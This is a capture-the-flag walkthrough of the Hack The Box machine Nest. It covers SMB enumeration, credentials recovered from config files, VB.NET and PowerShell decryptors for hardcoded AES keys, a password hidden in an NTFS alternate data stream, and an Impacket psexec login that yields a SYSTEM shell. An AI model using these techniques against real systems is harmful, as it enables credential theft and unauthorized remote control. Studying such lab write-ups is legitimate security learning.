Port Scan

~/Documents/HTB/Nest root@kali
❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Tue Feb 4 21:59:16 2020 as: nmap -sC -sV -oN nmap_All.txt -p- 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.33s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSVersionBindReqTCP, NULL, RPCCheck:
| Reporting Service V1.2
| GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| Reporting Service V1.2
|_ Unrecognised command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=2/4%Time=5E397FB6%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>");

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 4 22:30:41 2020 -- 1 IP address (1 host up) scanned in 1884.97 seconds

Nmap shows two open ports: 445, and a port whose service it cannot identify. Port 445 is SMB.

~/Documents/HTB/Nest root@kali
❯ smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available

Port 4386 is a service called HQK Reporting; it can be interacted with using telnet (nc does not work).

~/Documents/HTB/Nest root@kali
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>help debug


DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples:
DEBUG MyPassw0rd Attempts to enable debug mode by using the
password "MyPassw0rd"

>

As you can see, running DEBUG requires a password, so the first thing we try is to find that password.

User.txt

We find that we have permission to read the Shared directory inside the Data SMB share.

~/Documents/HTB/Nest root@kali 9s
❯ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.

smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \IT\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Reports\*
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

Welcome Email.txt contains credentials for the user TempUser: welcome2019

~/Documents/HTB/Nest root@kali
❯ grep -rni "User" Shared/
Shared/Templates/HR/Welcome Email.txt:4:\\HTB-NEST\Users\<USERNAME>
Shared/Templates/HR/Welcome Email.txt:9:Username: TempUser

~/Documents/HTB/Nest root@kali
❯ grep -rni "password" Shared/
Shared/Templates/HR/Welcome Email.txt:10:Password: welcome2019

Continuing enumeration with these credentials yields many more files.

~/Documents/HTB/Nest root@kali 43s
❯ smbclient \\\\10.10.10.178\\Data -U tempuser
Enter WORKGROUP\tempuser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \IT\Configs\Adobe\editing.xml of size 246 as editing.xml (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Configs\Adobe\Options.txt of size 0 as Options.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \IT\Configs\Adobe\projects.xml of size 258 as projects.xml (0.2 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \IT\Configs\Adobe\settings.xml of size 1274 as settings.xml (1.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Configs\Atlas\Temp.XML of size 1369 as Temp.XML (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \IT\Configs\Microsoft\Options.xml of size 4598 as Options.xml (1.1 KiloBytes/sec) (average 0.4 KiloBytes/sec)
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (1.2 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \IT\Configs\NotepadPlusPlus\shortcuts.xml of size 2108 as shortcuts.xml (0.7 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (0.2 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.1 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \>

Further enumeration reveals credentials for the user C.smith in RU_config.xml, but it is easy to see that the password is not stored in plaintext.

~/Documents/HTB/Nest root@kali
❯ grep -rni "password" IT/
IT/Configs/RU Scanner/RU_config.xml:5: <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

~/Documents/HTB/Nest root@kali
❯ grep -rni "user" IT/
IT/Configs/RU Scanner/RU_config.xml:4: <Username>c.smith</Username>
IT/Configs/NotepadPlusPlus/config.xml:13: <GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
IT/Configs/NotepadPlusPlus/config.xml:100: <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
IT/Configs/NotepadPlusPlus/shortcuts.xml:9: <UserDefinedCommands>
IT/Configs/NotepadPlusPlus/shortcuts.xml:22: </UserDefinedCommands>

Attempts to decrypt it went nowhere. Checking the contents of every file by hand, we find the directory Secure$\IT\Carl\ referenced in config.xml.

~/Documents/HTB/Nest root@kali
❯ cat config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>

Interestingly, you cannot run dir inside IT, but you do have permission to enter Carl.

~/Documents/HTB/Nest root@kali 26s
❯ smbclient \\\\10.10.10.178\\Secure$ -U tempuser
Enter WORKGROUP\tempuser's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 8 07:08:12 2019
.. D 0 Thu Aug 8 07:08:12 2019
Finance D 0 Thu Aug 8 03:40:13 2019
HR D 0 Thu Aug 8 07:08:11 2019
IT D 0 Thu Aug 8 18:59:25 2019

10485247 blocks of size 4096. 6545194 blocks available
smb: \> cd IT
smb: \IT\> dir
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\>
smb: \IT\Carl\> dir
. D 0 Thu Aug 8 03:42:14 2019
.. D 0 Thu Aug 8 03:42:14 2019
Docs D 0 Thu Aug 8 03:44:00 2019
Reports D 0 Tue Aug 6 21:45:40 2019
VB Projects D 0 Tue Aug 6 22:41:55 2019

10485247 blocks of size 4096. 6545194 blocks available

In the directory VB Projects/WIP/RU/RUScanner we find Utils.vb, which contains the encryption and decryption methods.

~/Documents/HTB/Nest/VB Projects/WIP/RU/RUScanner root@kali
❯ cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    ' Passphrase, salt, iteration count, IV and key size are all hardcoded here,
    ' so anyone with this source (or the compiled binary) can reverse the scheme
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        ' Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        ' Same PBKDF2 derivation as in Encrypt: identical inputs give the identical key
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class

Delete the encryption function, keep the decryption function, learn enough VB syntax (this took a very long time), and call the decryption function from Main to decrypt the password found earlier.

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1

    Public Sub Main()
        ' Ciphertext is the Password= value from Ldap.conf; the parameters in
        ' DecryptString below are the ones hardcoded in HqkLdap.exe's CR class
        Console.WriteLine(DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="))
        Console.ReadLine()
    End Sub

    Public Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
        End If
    End Function

    ' Unchanged copy of Utils.Decrypt from the RUScanner project
    Public Function Decrypt(ByVal cipherText As String, _
                            ByVal passPhrase As String, _
                            ByVal saltValue As String, _
                            ByVal passwordIterations As Integer, _
                            ByVal initVector As String, _
                            ByVal keySize As Integer) _
                            As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Module


Running the VB online at https://dotnetfiddle.net/ gives C.smith's recovered password xRxRxPANCAK3SxRxRx. Logging in to SMB with these credentials, we get User.txt from that user's directory.

~/Documents/HTB/Nest root@kali 24m 48s
❯ smbclient \\\\10.10.10.178\\users -U c.smith
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jan 26 07:04:21 2020
.. D 0 Sun Jan 26 07:04:21 2020
Administrator D 0 Fri Aug 9 23:08:23 2019
C.Smith D 0 Sun Jan 26 15:21:44 2020
L.Frost D 0 Fri Aug 9 01:03:01 2019
R.Thompson D 0 Fri Aug 9 01:02:50 2019
TempUser D 0 Thu Aug 8 06:55:56 2019

10485247 blocks of size 4096. 6447114 blocks available
smb: \> cd C.smith
smb: \C.smith\> dir
. D 0 Sun Jan 26 15:21:44 2020
.. D 0 Sun Jan 26 15:21:44 2020
HQK Reporting D 0 Fri Aug 9 07:06:17 2019
user.txt A 32 Fri Aug 9 07:05:24 2019

10485247 blocks of size 4096. 6447114 blocks available
smb: \C.smith\> get user.txt
getting file \C.smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

~/Documents/HTB/Nest root@kali
❯ cat user.txt
cf71b25404be5d84fd827e05f426e987

Root.txt

We notice that C.smith's user directory also contains an HQK Reporting directory, which holds Debug Mode Password.txt.

smb: \C.smith\> cd "HQK Reporting"
smb: \C.smith\HQK Reporting\> dir
. D 0 Fri Aug 9 07:06:17 2019
.. D 0 Fri Aug 9 07:06:17 2019
AD Integration Module D 0 Fri Aug 9 20:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019

10485247 blocks of size 4096. 6543918 blocks available
smb: \C.smith\HQK Reporting\>

But its size is 0, and after getting it locally there is nothing more to be learned from it. I was stuck here until someone on the forum told me about NTFS Steganography, a trick based on the NTFS file system (alternate data streams); the hidden data cannot be transferred over the network this way, so my only option was to mount the SMB share from Windows. Using the method from that article, we obtain the password for port 4386: WBQ201953D8w

C:\Users\7737>dir Z:\
驱动器 Z 中的卷没有标签。
卷的序列号是 2C6F-6A14

Z:\ 的目录

2020/01/26 07:04 <DIR> .
2020/01/26 07:04 <DIR> ..
2019/08/09 23:08 <DIR> Administrator
2020/01/26 15:21 <DIR> C.Smith
2019/08/09 01:03 <DIR> L.Frost
2019/08/09 01:02 <DIR> R.Thompson
2019/08/08 06:55 <DIR> TempUser
0 个文件 0 字节
7 个目录 26,803,638,272 可用字节

C:\Users\7737>dir /r "Z:\C.Smith\HQK Reporting"
驱动器 Z 中的卷没有标签。
卷的序列号是 2C6F-6A14

Z:\C.Smith\HQK Reporting 的目录

2019/08/09 07:06 <DIR> .
2019/08/09 07:06 <DIR> ..
2019/08/09 20:18 <DIR> AD Integration Module
2019/08/09 07:08 0 Debug Mode Password.txt
15 Debug Mode Password.txt:Password:$DATA
2019/08/09 07:09 249 HQK_Config_Backup.xml
2 个文件 249 字节
3 个目录 26,407,178,240 可用字节

C:\Users\7737>type "Z:\C.Smith\HQK Reporting\Debug Mode Password.txt:Password:$DATA"
WBQ201953D8w

C:\Users\7737>
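The dir /r listing above only checks one directory. The following PowerShell is an added example, not part of the writeup: it walks an entire mounted share and reports every file that carries a named data stream besides the default ::$DATA, which is exactly how a 0-byte Debug Mode Password.txt can hide a 15-byte Password stream. It assumes the Users share is mapped as Z:, as in the session above.

```powershell
# Added example: find files with alternate data streams on a mounted NTFS/SMB path.
# Assumes the share is mapped as Z: (as in the dir /r session above).
function Find-AlternateDataStreams {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Get-Item -Stream * lists every $DATA stream of one file; the unnamed
            # (normal) content is reported as ':$DATA', anything else is an ADS.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                    }
                }
        }
}

# Report hidden streams across the whole share; a 0-byte file with a non-empty
# ADS (like Debug Mode Password.txt above) stands out immediately.
Find-AlternateDataStreams -Path 'Z:\' | Format-Table -AutoSize

# Reading one stream directly is the PowerShell equivalent of the 'type' command above:
# Get-Content -LiteralPath 'Z:\C.Smith\HQK Reporting\Debug Mode Password.txt' -Stream 'Password'
```

Streams only survive on NTFS and over SMB to an NTFS volume; copying the file out with smbclient drops them, which is why the file looked empty earlier.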

Using this password to enter debug mode and enumerating further, we find the administrator's encrypted password and an executable in the LDAP directory.

~/Documents/HTB/Nest root@kali
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml

Current Directory: HQK
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1] HqkLdap.exe
[2] Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Decrypting it with the earlier decryption code fails. Reversing the binary, we find a new salt in the CR class.

namespace HqkLdap
{
    // Token: 0x02000007 RID: 7
    public class CR
    {
        // Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
        public static string DS(string EncryptedString)
        {
            if (string.IsNullOrEmpty(EncryptedString))
            {
                return string.Empty;
            }
            return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

        // RD and the remaining decompiled members are not shown here
    }
}
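Both parameter sets found on the box (Utils.vb for RU_config.xml, CR.DS for Ldap.conf) drive the same .NET primitives, so the VB does not have to be rebuilt for each one. The following PowerShell is an added example, not code from the writeup or from the HQK project: it reproduces the Decrypt routine with the same .NET classes as a parameterised function. The point for defenders is that passphrase, salt, iteration count and IV are all constants shipped inside the binary, so this "encryption" protects nothing from anyone who can read HqkLdap.exe or the RUScanner source.

```powershell
# Added example: the Utils.vb Decrypt routine as a reusable PowerShell function.
# Every cryptographic input is a constant from the binary, hence reversible by design.
function ConvertFrom-HqkSecret {
    param(
        [Parameter(Mandatory)][string]$CipherText,   # base64 value from the config file
        [Parameter(Mandatory)][string]$PassPhrase,   # 1st argument to Decrypt()/RD()
        [Parameter(Mandatory)][string]$Salt,         # 2nd argument
        [Parameter(Mandatory)][int]$Iterations,      # PBKDF2 iteration count (3rd argument)
        [Parameter(Mandatory)][string]$InitVector,   # 16 ASCII chars = one AES block
        [int]$KeySize = 256
    )
    $saltBytes   = [System.Text.Encoding]::ASCII.GetBytes($Salt)
    $ivBytes     = [System.Text.Encoding]::ASCII.GetBytes($InitVector)
    $cipherBytes = [Convert]::FromBase64String($CipherText)

    # Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1, the same derivation Utils.vb performs
    $kdf = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($PassPhrase, $saltBytes, $Iterations)
    $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7   # .NET default, as in the VB
    $decryptor = $null
    try {
        $key = $kdf.GetBytes([int]($KeySize / 8))
        $decryptor = $aes.CreateDecryptor($key, $ivBytes)
        # TransformFinalBlock strips the PKCS7 padding, so no byte-count bookkeeping is needed
        $plain = $decryptor.TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
        [System.Text.Encoding]::ASCII.GetString($plain)
    } finally {
        if ($decryptor) { $decryptor.Dispose() }
        $aes.Dispose()
        $kdf.Dispose()
    }
}

# Parameter set 1: hardcoded in Utils.vb (RUScanner), applied to the RU_config.xml value
ConvertFrom-HqkSecret -CipherText 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=' `
    -PassPhrase 'N3st22' -Salt '88552299' -Iterations 2 -InitVector '464R5DFA5DL6LE28'

# Parameter set 2: hardcoded in HqkLdap.exe's CR.DS, applied to the Ldap.conf value
ConvertFrom-HqkSecret -CipherText 'yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=' `
    -PassPhrase '667912' -Salt '1313Rf99' -Iterations 3 -InitVector '1L1SA61493DRV53Z'
```

A wrong parameter set shows up as a padding exception from TransformFinalBlock rather than as garbage output, which is the quick way to tell that a config was produced by a different build of the tool.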

Replacing the salt in the code above yields the administrator's password XtH4nkS4Pl4y1nGX. Since the administrator account has write permission on the SMB shares, we use psexec to get root.txt.

~/Documents/HTB/Nest root@kali
❯ psexec.py 'administrator:XtH4nkS4Pl4y1nGX@10.10.10.178'
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file fLgfGSwC.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service xaOM on 10.10.10.178.....
[*] Starting service xaOM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>type root.txt
6594c2eb084bc0f08a42f0b94b878c41
C:\Users\Administrator\Desktop>